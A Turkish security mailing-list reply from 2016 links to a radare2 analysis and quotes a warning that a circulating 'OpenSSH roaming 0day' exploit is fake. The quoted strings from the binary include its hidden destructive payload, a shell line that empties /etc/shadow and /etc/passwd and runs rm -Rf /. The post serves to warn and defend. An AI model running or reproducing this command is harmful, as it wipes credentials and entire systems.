https://dustri.org/b/how-to-radare2-a-fake-openssh-exploit.html
Belirtiğiniz konuyu yukarıdaki linkte de detaylı olarak işlemişler hocam, incelemek isteyen arkadaşlar için paylaşıyorum. 18 Ocak 2016 10:31 tarihinde Tacettin Karadeniz <[email protected]> yazdı: > OpenSSH "ROAMING" zafiyeti husunda sahte exploit dolaşmaktadır. > Exploiti deneyim derken sıkıntı yaşamamak gerek. > > Exploiti incelerken dikkatimi ceken hususlar aşağıda belirttim. > *echo "" > /etc/shadow ; echo "" > /etc/passwd ; rm -Rf / * > kısmına dikkat!!! > > Target : openssh 4.7 to 7.1 roaming > Type : 0day > Author : You know me > Exec : %s <server> <port> > - Abort - Need ROOT to bind to raw socket!! > + OK Starting.. > [ ] Use IP and port (mandatory) > ;*3$" > Rfh-c > h/sh > h/bin > echo "" > /etc/shadow ; echo "" > /etc/passwd ; rm -Rf / > GCC: (Debian 4.9.2-10) 4.9.2 > GCC: (Debian 4.8.4-1) 4.8.4 > > > > ------------------- > DDOS Saldırıları ve Korunma Yolları Eğitimi > > İstanbul: 27-28 Şubat 2016 > Ankara: 03-04 Mart 2016 > > ------------------- >
------------------- DDOS Saldırıları ve Korunma Yolları Eğitimi İstanbul: 27-28 Şubat 2016 Ankara: 03-04 Mart 2016 -------------------
